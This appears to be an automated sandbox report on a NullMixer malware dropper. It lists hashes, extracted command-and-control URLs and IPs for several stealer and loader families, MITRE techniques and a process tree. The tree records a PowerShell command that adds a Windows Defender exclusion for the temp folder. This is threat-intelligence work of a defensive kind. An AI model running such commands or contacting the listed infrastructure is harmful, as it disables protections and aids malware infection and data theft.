nullmixer | 723e570331aa3284a7b94f247edd6c395df4dc0f55f1d263f418207c28ef0dbe

Analysis

max time kernel
151s
max time network
159s
platform
windows10-2004_x64
resource
win10v2004-20240221-en
resource tags

arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
submitted
25/02/2024, 20:13 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a47e4ba5794dfd910a1402833d5f379e.exe
Size

3.9MB
MD5

a47e4ba5794dfd910a1402833d5f379e
SHA1

37963628fd5ef4fbf99e03145374a31c99e54685
SHA256

723e570331aa3284a7b94f247edd6c395df4dc0f55f1d263f418207c28ef0dbe
SHA512

a0f1ae2333b8ba2d1fb4003ff35d71d2be1e7805d7d91363603b59083236a70b8f71288b10411bf0e1155fd300e55fa174952a7ac552bbffe21842048d9c9b95
SSDEEP

98304:yZQHaZj1nYFguGgVS1HcjTUYCPENx9wX8/gH28y14PsgjlbD3h:yZQGnAguGQS1Hc3UYP9d4W8y14BlbLh

Score

10^/10

nullmixer privateloader redline sectoprat smokeloader vidar 706 pab3 pub5 aspackv2 backdoor dropper infostealer loader persistence rat stealer trojan

Malware Config

Extracted

Family

privateloader

http://37.0.10.214/proxies.txt

http://37.0.10.171/server.txt

http://wfsdragon.ru/api/setStats.php

37.0.10.185

Extracted

Family

smokeloader

Botnet

pub5

Extracted

Family

redline

Botnet

pab3

185.215.113.15:61506

Extracted

Family

nullmixer

http://hsiens.xyz/

Extracted

Family

vidar

Version

Botnet

706

https://lenak513.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

1
0x3b22e540

rc4.i32

1
0xa6b397e0

Signatures

NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral2/memory/3416-111-0x0000000004BB0000-0x0000000004BD2000-memory.dmp	family_redline
behavioral2/memory/3416-118-0x0000000004E40000-0x0000000004E60000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral2/memory/3416-111-0x0000000004BB0000-0x0000000004BD2000-memory.dmp	family_sectoprat
behavioral2/memory/3416-118-0x0000000004E40000-0x0000000004E60000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral2/memory/3024-119-0x0000000004980000-0x0000000004A1D000-memory.dmp	family_vidar
behavioral2/memory/3024-149-0x0000000000400000-0x0000000002D1A000-memory.dmp	family_vidar

ASPack v2.12-2.42 3 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x000600000002322c-52.dat	aspack_v212_v242
behavioral2/files/0x000600000002322b-53.dat	aspack_v212_v242
behavioral2/files/0x000600000002322e-60.dat	aspack_v212_v242

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2828415587-3732861812-1919322417-1000\Control Panel\International\Geo\Nation	a47e4ba5794dfd910a1402833d5f379e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2828415587-3732861812-1919322417-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2828415587-3732861812-1919322417-1000\Control Panel\International\Geo\Nation	Wed018f781281d3.exe

Executes dropped EXE 14 IoCs

pid	Process
2760	setup_installer.exe
3592	setup_install.exe
3416	Wed01033f590d8.exe
1544	Wed0187dd5121696b.exe
1592	Wed01cc14a7b232c573c.exe
3024	Wed016c6ddb9ad40722.exe
4320	Wed018f781281d3.exe
3572	dwm.exe
4296	Wed01b1b688489137a.exe
1136	Wed01e6754f9438ea6c7.exe
4132	Wed018143c5ab.exe
2312	Wed018f781281d3.exe
3960	Volevo.exe.com
696	Volevo.exe.com

Loads dropped DLL 6 IoCs

pid	Process
3592	setup_install.exe
3592	setup_install.exe
3592	setup_install.exe
3592	setup_install.exe
3592	setup_install.exe
3592	setup_install.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Wed018143c5ab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
35	iplogger.org
37	iplogger.org
34	iplogger.org

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 9 IoCs

pid	pid_target	Process	procid_target
1944	3592	WerFault.exe	92
4956	3024	WerFault.exe	114
1996	3024	WerFault.exe	114
3700	3024	WerFault.exe	114
3504	3024	WerFault.exe	114
1480	3024	WerFault.exe	114
3100	3024	WerFault.exe	114
2456	3024	WerFault.exe	114
3700	3024	WerFault.exe	114

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed01cc14a7b232c573c.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed01cc14a7b232c573c.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed01cc14a7b232c573c.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	dwm.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dwm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dwm.exe

Modifies data under HKEY_USERS 44 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5004	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1592	Wed01cc14a7b232c573c.exe
1592	Wed01cc14a7b232c573c.exe
1816	powershell.exe
1816	powershell.exe
1816	powershell.exe
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1592	Wed01cc14a7b232c573c.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1136	Wed01e6754f9438ea6c7.exe
Token: SeDebugPrivilege	3572	dwm.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	3416	Wed01033f590d8.exe
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeCreateGlobalPrivilege	3572	dwm.exe
Token: SeChangeNotifyPrivilege	3572	dwm.exe
Token: 33	3572	dwm.exe
Token: SeIncBasePriorityPrivilege	3572	dwm.exe
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeCreateGlobalPrivilege	4884	dwm.exe
Token: SeChangeNotifyPrivilege	4884	dwm.exe
Token: 33	4884	dwm.exe
Token: SeIncBasePriorityPrivilege	4884	dwm.exe
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeCreateGlobalPrivilege	764	dwm.exe
Token: SeChangeNotifyPrivilege	764	dwm.exe
Token: 33	764	dwm.exe
Token: SeIncBasePriorityPrivilege	764	dwm.exe
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found
Token: SeShutdownPrivilege	3260	Process not Found
Token: SeCreatePagefilePrivilege	3260	Process not Found

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3960	Volevo.exe.com
3260	Process not Found
3260	Process not Found
3960	Volevo.exe.com
3960	Volevo.exe.com
3260	Process not Found
3260	Process not Found
696	Volevo.exe.com
3260	Process not Found
3260	Process not Found
696	Volevo.exe.com
696	Volevo.exe.com
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
3960	Volevo.exe.com
3960	Volevo.exe.com
3960	Volevo.exe.com
696	Volevo.exe.com
696	Volevo.exe.com
696	Volevo.exe.com
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found
3260	Process not Found

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3260	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4888 wrote to memory of 2760	4888	a47e4ba5794dfd910a1402833d5f379e.exe	90
PID 4888 wrote to memory of 2760	4888	a47e4ba5794dfd910a1402833d5f379e.exe	90
PID 4888 wrote to memory of 2760	4888	a47e4ba5794dfd910a1402833d5f379e.exe	90
PID 2760 wrote to memory of 3592	2760	setup_installer.exe	92
PID 2760 wrote to memory of 3592	2760	setup_installer.exe	92
PID 2760 wrote to memory of 3592	2760	setup_installer.exe	92
PID 3592 wrote to memory of 864	3592	setup_install.exe	117
PID 3592 wrote to memory of 864	3592	setup_install.exe	117
PID 3592 wrote to memory of 864	3592	setup_install.exe	117
PID 3592 wrote to memory of 4068	3592	setup_install.exe	96
PID 3592 wrote to memory of 4068	3592	setup_install.exe	96
PID 3592 wrote to memory of 4068	3592	setup_install.exe	96
PID 3592 wrote to memory of 4072	3592	setup_install.exe	102
PID 3592 wrote to memory of 4072	3592	setup_install.exe	102
PID 3592 wrote to memory of 4072	3592	setup_install.exe	102
PID 3592 wrote to memory of 2856	3592	setup_install.exe	101
PID 3592 wrote to memory of 2856	3592	setup_install.exe	101
PID 3592 wrote to memory of 2856	3592	setup_install.exe	101
PID 3592 wrote to memory of 3580	3592	setup_install.exe	99
PID 3592 wrote to memory of 3580	3592	setup_install.exe	99
PID 3592 wrote to memory of 3580	3592	setup_install.exe	99
PID 3592 wrote to memory of 2308	3592	setup_install.exe	98
PID 3592 wrote to memory of 2308	3592	setup_install.exe	98
PID 3592 wrote to memory of 2308	3592	setup_install.exe	98
PID 3592 wrote to memory of 1620	3592	setup_install.exe	97
PID 3592 wrote to memory of 1620	3592	setup_install.exe	97
PID 3592 wrote to memory of 1620	3592	setup_install.exe	97
PID 3592 wrote to memory of 2540	3592	setup_install.exe	100
PID 3592 wrote to memory of 2540	3592	setup_install.exe	100
PID 3592 wrote to memory of 2540	3592	setup_install.exe	100
PID 3592 wrote to memory of 3140	3592	setup_install.exe	116
PID 3592 wrote to memory of 3140	3592	setup_install.exe	116
PID 3592 wrote to memory of 3140	3592	setup_install.exe	116
PID 3592 wrote to memory of 4656	3592	setup_install.exe	115
PID 3592 wrote to memory of 4656	3592	setup_install.exe	115
PID 3592 wrote to memory of 4656	3592	setup_install.exe	115
PID 864 wrote to memory of 1816	864	cmd.exe	105
PID 864 wrote to memory of 1816	864	cmd.exe	105
PID 864 wrote to memory of 1816	864	cmd.exe	105
PID 1620 wrote to memory of 1544	1620	cmd.exe	109
PID 1620 wrote to memory of 1544	1620	cmd.exe	109
PID 1620 wrote to memory of 1544	1620	cmd.exe	109
PID 2308 wrote to memory of 3416	2308	cmd.exe	103
PID 2308 wrote to memory of 3416	2308	cmd.exe	103
PID 2308 wrote to memory of 3416	2308	cmd.exe	103
PID 4068 wrote to memory of 4320	4068	cmd.exe	113
PID 4068 wrote to memory of 4320	4068	cmd.exe	113
PID 4068 wrote to memory of 4320	4068	cmd.exe	113
PID 4072 wrote to memory of 1592	4072	cmd.exe	104
PID 4072 wrote to memory of 1592	4072	cmd.exe	104
PID 4072 wrote to memory of 1592	4072	cmd.exe	104
PID 2540 wrote to memory of 3572	2540	cmd.exe	140
PID 2540 wrote to memory of 3572	2540	cmd.exe	140
PID 3580 wrote to memory of 3024	3580	cmd.exe	114
PID 3580 wrote to memory of 3024	3580	cmd.exe	114
PID 3580 wrote to memory of 3024	3580	cmd.exe	114
PID 2856 wrote to memory of 4296	2856	cmd.exe	108
PID 2856 wrote to memory of 4296	2856	cmd.exe	108
PID 4656 wrote to memory of 1136	4656	cmd.exe	112
PID 4656 wrote to memory of 1136	4656	cmd.exe	112
PID 3140 wrote to memory of 4132	3140	cmd.exe	107
PID 3140 wrote to memory of 4132	3140	cmd.exe	107
PID 3140 wrote to memory of 4132	3140	cmd.exe	107
PID 4132 wrote to memory of 4700	4132	Wed018143c5ab.exe	118

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\a47e4ba5794dfd910a1402833d5f379e.exe
"C:\Users\Admin\AppData\Local\Temp\a47e4ba5794dfd910a1402833d5f379e.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4888
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed018f781281d3.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4068
    - - C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed018f781281d3.exe
        
        Wed018f781281d3.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4320
      - C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed018f781281d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed018f781281d3.exe" -a
        6⤵
        Executes dropped EXE
        
        PID:2312
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed0187dd5121696b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1620
    - - C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed0187dd5121696b.exe
        
        Wed0187dd5121696b.exe
        5⤵
        Executes dropped EXE
        
        PID:1544
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed01033f590d8.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2308
    - - C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed01033f590d8.exe
        
        Wed01033f590d8.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed016c6ddb9ad40722.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3580
    - - C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed016c6ddb9ad40722.exe
        
        Wed016c6ddb9ad40722.exe
        5⤵
        Executes dropped EXE
        
        PID:3024
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 824
        6⤵
        Program crash
        
        PID:4956
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 832
        6⤵
        Program crash
        
        PID:1996
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 832
        6⤵
        Program crash
        
        PID:3700
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 856
        6⤵
        Program crash
        
        PID:3504
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 992
        6⤵
        Program crash
        
        PID:1480
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 1072
        6⤵
        Program crash
        
        PID:3100
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 1404
        6⤵
        Program crash
        
        PID:2456
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 1760
        6⤵
        Program crash
        
        PID:3700
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed0112c658c50.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2540
    - - C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed0112c658c50.exe
        
        Wed0112c658c50.exe
        5⤵
        
        PID:3572
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed01b1b688489137a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2856
    - - C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed01b1b688489137a.exe
        
        Wed01b1b688489137a.exe
        5⤵
        Executes dropped EXE
        
        PID:4296
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed01cc14a7b232c573c.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4072
    - - C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed01cc14a7b232c573c.exe
        
        Wed01cc14a7b232c573c.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1592
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3592 -s 576
      4⤵
      Program crash
      PID:1944
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed01e6754f9438ea6c7.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4656
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed018143c5ab.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3140
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3592 -ip 3592
1⤵
PID:3100

C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed018143c5ab.exe
Wed018143c5ab.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
